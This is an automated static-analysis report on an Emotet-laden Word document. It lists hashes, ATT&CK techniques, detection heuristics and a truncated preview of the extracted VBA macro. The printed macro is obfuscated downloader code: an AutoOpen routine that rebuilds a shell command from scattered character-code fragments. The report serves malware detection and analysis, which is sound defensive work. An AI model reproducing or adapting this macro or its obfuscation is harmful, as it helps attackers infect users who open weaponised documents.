Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 66c92ce7904ff4f7…

MALICIOUS

Office (OLE)

Size: 216.8 KB
Created: 2018-06-28 07:15:00
Authoring application: Microsoft Office Word
First seen: 2018-07-14
MD5: b7592c3802ecb5ba810a3cce898d32d3
SHA-1: 7b196dc9c22a4e539085afb16f3b1d0bd62eae7d
SHA-256: 66c92ce7904ff4f711b70e30988a5a96eda9b1fbe7d5fccf19004bd44b457523
Risk score: 282

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a VBA macro with an AutoOpen function that calls Shell(), a technique commonly used by Emotet; ClamAV detection confirms the family. The macro's obfuscated code likely assembles and executes a command that downloads a secondary payload: the recovered source concatenates long lists of numeric character codes together with a "-jOIn" fragment, which is consistent with a command string being rebuilt from character codes at run time. Separately, the 'SE_PASSWORD_ARCHIVE_LURE' heuristic suggests the document body itself may carry instructions for opening an encrypted (password-protected) payload.

Heuristics (8)

  • ClamAV: Doc.Downloader.Emotet-6877388-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6877388-0
  • VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Password-protected archive handoff (high, SE_PASSWORD_ARCHIVE_LURE)
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: document text, OLE body). This is the standard DrawingML XML namespace identifier embedded in Office documents, not a download location.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 11991 bytes
SHA-256: 57ad4664e4527bd811ec6d88b57ddf561f45ea34d75387b30f22f94c66a27ef6

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "VzbstiCcGLbc"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "DjpCLRAWJ"
Function lzkqHJusO()
On Error Resume Next
wOwqO = ChrB(91694 + _
Sin(knREj * CLng(NBsPE + 18776) _
 + 96292 _
+ UOVQS))
jhjXD _
= 10969 + Atn(89537) / 5944 / _
Round(74151) / 9658 / CInt(ZmSrGd)
ljYmEbnjR = "HELL" + "    " + "     " + "         " + "         " + "       "
GfXYuD = ChrB(74270 + _
Sin(fDbAbZ * CLng(fXhHPO + 87536) _
 + 57611 _
+ TjZlZ))
kCfBq _
= 74326 + Atn(90747) / 331 / _
Round(63851) / 18109 / CInt(SkPTSd)
uuMqIVrcXb = "       -" + "jOIn" + Chr(40) + " " + Chr(40) + " 4" + "5 ,12" + "3, 65 ,1" + "11 ,52," + "103 , " + "108, 12"
ErmKN = ChrB(68454 + _
Sin(BKEKi * CLng(XwVaP + 8247) _
 + 29326 _
+ nLYfA))
hBkXKm _
= 85471 + Atn(24065) / 16981 / _
Round(54035) / 28546 / CInt(HrYjhP)
QaRzahLLVP = "6 ,36 , 1" + "02 ," + " 107" + ", 99 , 10" + "8 , 10" + "6 , 1" + "25,41," + "71 , 1" + "08, 125 " + ",39 , " + "94 , 108," + "107, "
zOWLVw = ChrB(33925 + _
Sin(ALRjOf * CLng(OaPVR + 18850) _
 + 39399 _
+ CFaisQ))
lmomB _
= 18688 + Atn(30362) / 39973 / _
Round(82305) / 91048 / CInt(WnzkhI)
szzBT = "74,10" + "1,96,108," + "103 ," + "125,50, " + "45, 7" + "1,78 ,96" + ",52 , 46"
LJZWVM = ChrB(81675 + _
Sin(ddTFvP * CLng(MimMd + 76512) _
 + 95737 _
+ PAwfwm))
ZFCah _
= 74110 + Atn(98133) / 51217 / _
Round(32371) / 82177 / CInt(XJDDJ)
MPiBGYNQIJn = ", 97,125" + " ,125" + " , 121" + " , 51,3" + "8, 38 , 1" + "10,101 " + ", 10" + "4 ,109 , " + "126, 11" + "2,103 ,1" + "08 ,106 ,"
bvKaR = ChrB(83369 + _
Sin(tOjJWW * CLng(uBRwUK + 3569) _
 + 84485 _
+ VnhSRB))
hzvtX _
= 66577 + Atn(83906) / 90525 / _
Round(9102) / 87062 / CInt(mEJfU)
BVjqiEjYiA = "104 " + ",121," + " 96, 125" + ", 104," + " 101,39," + " 106 " + ", 102,"
SkmML = ChrB(20840 + _
Sin(jFpmk * CLng(OrURZ + 82375) _
 + 87476 _
+ tZjhMu))
RjfcDA _
= 53441 + Atn(71751) / 29382 / _
Round(15129) / 30020 / CInt(JzhYi)
tfWIJpnD = "100, 38 " + ",103,6" + "3 ,77 " + ", 57 ," + " 38, 73,9" + "7,125" + ", 125,12" + "1,51,3" + "8 , 38,1" + "26,126," + " 126,39"
ijBIoi = ChrB(15852 + _
Sin(oiYKFf * CLng(QRAOBX + 71505) _
 + 34714 _
+ bMMBW))
irnPz _
= 12589 + Atn(98189) / 32114 / _
Round(14495) / 8804 / CInt(UJTvm)
UIzvNFYlDEw = " ,107, " + "104," + "125, 97 ," + "102 , 111" + " , 111,39" + ", 123 , " + "124 ,"
ErShk = ChrB(53805 + _
Sin(RljbVH * CLng(EYaXX + 57327) _
 + 41721 _
+ YGFWq))
JwnhCd _
= 87390 + Atn(87802) / 88577 / _
Round(17243) / 59829 / CInt(KXaFCY)
IPRokhKC = "38, 81," + "111,99" + ", 48," + " 65 ," + "38, 7" + "3,97," + "125, 125" + " , 121,5" + "1, 38 ,38"
XVFzzi = ChrB(58161 + _
Sin(EhSLbO * CLng(SXwLRj + 61327) _
 + 87923 _
+ hJUSV))
upVKob _
= 34648 + Atn(86600) / 83030 / _
Round(33312) / 5030 / CInt(ILHMS)
lBdZNlqmn = ", 126" + ",126,12" + "6 ,39," + "122 , 125" + ",104," + " 110, 96," + "103, 1" + "10, 39" + ",100 ," + "96, 10" + "6 , 97" + ",104,"
TpoLBA = ChrB(13235 + _
Sin(buRqNL * CLng(uSHXK + 29309) _
 + 33251 _
+ cHZknI))
OLoRw _
= 39738 + Atn(40322) / 89758 / _
Round(79402) / 74273 / CInt(tXkafp)
lLYbFA = " 108" + ",101 ,121" + ", 108," + "104,106 ," + "97 ,108" + " , 112" + " , 3" + "9 ,106," + " 102, 100"
UTcSS = ChrB(15326 + _
Sin(ZCrMEc * CLng(TjSJP + 44770) _
 + 64900 _
+ tZOwj))
lCTjw _
= 61829 + Atn(40401) / 6505 / _
Round(20091) / 76354 / CInt(Gtacw)
EfAZV = ", 39 " + ",104 ," + "124 " + ",38," + "83 ,1" + "06 ,95,1" + "06 ," + " 38, 73" + " , 97"
lzkqHJusO = ljYmEbnjR + uuMqIVrcXb + QaRzahLLVP + szzBT + MPiBGYNQIJn + BVjqiEjYiA + tfWIJpnD + UIzvNFYlDEw + IPRokhKC + lBdZNlqmn + lLYbFA + EfAZV
XrXaRM = ChrB(52183 + _
Sin(HaDDVY * CLng(QiTMvb + 321) _
 + 99549 _
+ bqVia))
IYXzIA _
= 31079 + Atn(37622) / 61469 / _
Round(82033) / 35838 / CInt(oGwoIw)
End Function
Function aBkSMcL()
On Error Resume Next
JpSUw = ChrB(53
... (truncated)